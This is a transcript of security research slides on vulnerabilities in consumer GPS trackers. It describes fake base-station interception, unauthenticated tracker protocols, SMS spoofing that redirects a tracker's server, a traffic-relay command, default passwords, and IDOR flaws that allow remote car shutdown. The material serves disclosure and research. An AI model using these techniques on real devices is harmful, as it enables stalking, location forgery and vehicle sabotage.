all your gps trackers belong to us...stop/start command with a remote control (!) auto-shutdown of...
TRANSCRIPT
1
All your GPS Trackers belong to Us
2
Who we are
Pierre Barre, Lead Security Researcher, Mobile and Telecom Lab
Chaouki Kasmi, Lab Director, Mobile and Telecom Lab
Eiman Al Shehhi, Security Researcher, Mobile and Telecom Lab
The opinions and results presented in this article are the sole responsibility of the authors.
Tests and Validation Labs, xen1thLabs, DarkMatter Group
3
GPS Tracker Technology
Cheap
Using remote management without advertising it
Available everywhere
Compatible with IOS/Android
4
Presentation
Infrastructure
Devices
Blackbox analysis
Information gathering (FCC ID)
Network analysis (Wireless and wired)
Reverse Engineering (hard, firmware, clients)
OWASP - webapp
5
General Architecture
Points of interaction:
• Radio interface (GPS/mobile network)
• Remote servers• Web application • Mobile application • Management protocols
Internet
Internet
GPS Satellites
Mobile Network
Tracked devices/items
Tracking reports
Management Servers
Data Base
Web Servers
6
Existing researches
Web analysis – Trackmageddon (Multiple vulnerabilities in the online services of (GPS)
location tracking devices)
Kang Wang, Shuhua Chen, Aimin Pan, Time and Position Spoofing with Open Source Projects
Fidus, Exploiting 10,000+ devices used by Britain’s most vulnerable
7
Defining attack surfaces
Security of GPS trackers is well-known
Objectives: finding new vulnerabilities/weaknesses, having fun, hacking the planet
Exploitation: detecting trackers (2G, 2.5G, 3G and IP Network), tracking people,
remotely shutdown car engines, GPS informations, BTS and eNodeB information
Attack Surfaces:
Radio – passive (2G, GPRS)
Radio – active (2G, GPRS and GPS)
Network (Layer 3!) – remote management server and custom protocols
Hardware attack - tracker
Software attack - tracker
Software attack - iOS/Android clients
Web interface (management)
8
Analyzed trackers
Multiple GPS trackers bought online (Aliexpress)
Presentation of the devices
3 types of GPS / infrastructures
GPS infrastructures share the same technologies!
Chinese domination on existing solutions
2 solutions
GSM (A5/1) interception
Setup of a custom BTS
1 paper in MISC (focused on methodology)
1 scientific paper (focused on privacy)
9
Passive Radio Attack
YateBTS with sgsntun interface
SIM cards (not USIM)
Live demo!
Registration (using IMEI or S/N and 123456)
Creation of account in advance
Configuration using SMS
First Fail: content of all SMS sent to China (we will come back to this later)
Proprietary protocols over text messages
10
Passive Radio Attack
Setup is very cheap (BladeRF, SIM cards, Internet)
Very good results in a limited time
All trackers send coordinates to IPs in China
The traffic is not encrypted and is easily identifiable
Passwords sent in clear-text, S/N used as a token
SMS configuration is generic and very dangerous
“Firewall” using a master phone number – bypassed by spoofing Caller-ID
Phone number of the tracker is supposed to be “secret” (security/privacy)
11
Passive Radio Attack – configuration using SMS
1. SMS (Status) is sent to tracker from 440025239
over 2G
1. Sniffing of GPRS data from the tracker:
1. IP packet to 203.130.62.29:8841
2. 690217122612463 = S/N of GPS tracker
3. +440025239 is the sender
4. Status is the content of SMS
Only specific commands sent from SMS?
1. SMS (jjjj[…]) is sent to tracker using 2G
2. Tracker send the content of SMS to a remote
Server (203.130.62.29)
12
Passive Network Attack – RE of custom protocols
No authentication
\x79\x79\x00 I \xf2 [S/N-ASCII][BLOB-ASCII] \x01\x7e [BLOB-ASCII]
Traffic sent to 203.130.62.29:8841/tcp (geo-located in China)
Basic client allowing us to send forged coordinates
Where is Waldo ?
Pinging 203.130.62.29 with 32 bytes of data:
Reply from 203.130.62.29: bytes=32 time=9ms TTL=58
Reply from 203.130.62.29: bytes=32 time=10ms TTL=58
10ms and 6 hops ? To China ? Impossible
203.130.62.29/24 is announced by Etisalat, the largest UAE provider, and hosted in Dubai
Everything (configuration, tracking, information, phone numbers) is sent to UAE
Big trust given to the manufacturer. GDPR anyone ?
Reconfiguration of the management server using SMS = allows expats to setup a SMS forward service
for no cost
13
Passive Network Attack – RE of custom protocols
U-Blox module – connection to a TCP service on the 56447/tcp port:
cmd=full;[email protected];pwd=XXXXXX;lat=22.680193;lon=114.146846;alt=0.0;pacc=100.00
u-blox a-gps server (c) 1997-2009 u-blox AG
Content-Length: 2856
Content-Type: application/ubx
.b..0......
The client then regularly sends information to a second server (8011 / tcp) indicating its
position:
*HQ,17000XXXXX,V1,115112,A,2240.8116,N,11408.8108,E,000.0,000.00,100119,FFFFFFFF#
*HQ,17000XXXXX,NBR,094111,310,26,02,1,1000,10,23,100119,FFFFFFFF#
*HQ,17000XXXXX,LINK,115112,22,0,6,0,0,100119,FFFFFFFF#
*HQ,17000XXXXX,NBR,115117,310,26,02,1,1000,10,22,100119,FFFFFFFF#
Different commands can be detected according to the serial number (17000XXXXX).
2240.8116 corresponds to the latitude 22.408116 and the longitude 11.4088108.
14
Active Network Attack – RE of custom protocols
There is no authentication in the protocol
We wrote a client in Perl resulting in locations in North Korea:
An attacker able to guess a serial number can
send false information to the GPS management
infrastructure.
Hint: this is do-able
15
Active Radio Attack
GPS Spoofing – public for years
Detection of GPS trackers using SMS (custom keywords without “authentication”)
Custom spoofed SMS (“reg my_ip”)
Not always mandatory to spoof
New management server defined
Using `balance` to intercept and change the traffic over the Internet
balance -b ::ffff:my_ip 8841 203.130.62.29:8841
Data traffic modification on-the-fly (mitmproxy, bettercap, …)
Use a faraday cage
Don’t do this at home
16
Active Radio Attack
Voice
Using the device to listen (2G)
Call-back support (by SMS)
Microphone
Movement/noise detectors
Cameras
Additional wireless interfaces
Wireless client
Scanner
RF - attack surface
17
Network – attack surface
Multiple trackers – multiple remote management servers
3 GPS trackers, 3 different back-ends
Infrastructures based on a few OEM solutions
Chinese IPs but:
Located in China,
Located in Germany,
Located in UAE (open ports, banking websites, …),
Reverse Engineering of protocols: Done
Specific traffic: on the ISP side, easy to detect, extract coordinates and modify on-the-fly
APIs
Live demo
18
Hardware Attack
GPS chips:
U-blox G7020
SIMCom SIM800
Support of GPS, GLONASS, QZSS, Galilleo
Flash memory (4MB)
MediaTek SOC (ARM - MT6261DA)
No protection against physical attacks
UART port
Firmware dumping
Debug interface available
Analysis (ARM)
Hidden commands found
19
Software Attack
ARM dump
Loaded within IDA Pro
Nucleus RTOS
Data Line S8 Locator – hidden commands
Backdoors SMS codes
Different trackers, different OEMS, different commands
different network protocols
Not all of these SMS commands seem to be functional.
SMS parsing, Quick’n’Dirty
HTTP client and custom client
Parsing prone to errors
No firmware update features
20
Android/IOS Clients
Dynamic Analysis (android emulator)
Static Analysis (jadx)
Results
Authentication (login/password)
APIs access
(Lack of?) Authentication for APIs
Need an unrelated valid session
Communication over HTTP (no encryption)
http://m.999gps.net/OpenAPIV2.asmx with debug!
http://m.999gps.net/OpenAPIV2.asmx?WSDL (full description!)
Insecure Direct Object References
IDOR Already found by Trackmaggedon team in January 2018!
21
Web Interface – attack surface
Web site
Live information (GPS, speed)
Replay
Geofence definition
OEM version (.NET) provided to a lot of providers of GPS
products
22
Web Interface – attack surface – Geofence
Authentication based on last 7 integers of the S/N
Default pwd: 123456
Geofence:
Stop/start command with a remote control (!)
Auto-shutdown of the car (!)
Alerts (SMS, push on app)
Vulnerable to IDOR
Anyone can geofence your tracker
Blindly trust the (forged) GPS information
sent to the server
Good idea, very bad implementation
23
Web Interface – attack surface
Web interface full of vulnerabilities
IDOR everywhere (tracker ID: 82383)
Full history of GPS tracker data
APIs
Let’s dig
Full of vulnerabilities
Same as Android/IOS
Kudos to Trackmaggedon team (pwn of 100s APIs)
Live demo
GDPR?
24
Conclusion
Thanks!
Black box devices – implementations from big OEM vendor
Used everywhere (in industrial machines too)
Cell-IDs – can be used to map the critical mobile telecom infrastructure of a given country
Huge subject (including RE, network analysis, SDR, web) – a real CTF
Hope you had fun!
Still some work to do!
At xen1thLabs we are committed to uncovering new vulnerabilities that combat tomorrow’s
threats today.
25
References
V. Stykas, M. Gruhn, Multiple vulnerabilities in the online services of (GPS) location tracking devices, [online] https://0x0.li/trackmageddon/
Kang Wang, Shuhua Chen, Aimin Pan, Time and Position Spoofing with Open Source Projects, BlackHat Europe 2015, Amsterdam, NL, [online] https://www.blackhat.com/docs/eu-15/materials/eu-15-Kang-Is-Your-Timespace-Safe-Time-And-Position-Spoofing-Opensourcely-wp.pdf
https://github.com/osqzss/gps-sdr-sim
302 GPS TRACKER, [online]
https://fccid.io/2AA64-302/User-Manual/User-Manual-3470390
YateBTS GSM basestation - Open Source Software, [online] https://yatebts.com/open_source/#svn
https://github.com/skylot/jadx
GPS tracking vulnerabilities leave millions of products at risk By Steve Ragan, Senior Staff Writer, CSO | JANUARY 02, 2018
https://www.csoonline.com/article/3245312/gps-tracking-vulnerabilities-leave-millions-of-products-at-risk.html
security issue in kids/ elderly tracking watches
https://fil.forbrukerradet.no/wp-content/uploads/2017/10/watchout-rapport-october-2017.pdf
https://www.pentestpartners.com/security-blog/tracking-and-snooping-on-a-million-kids/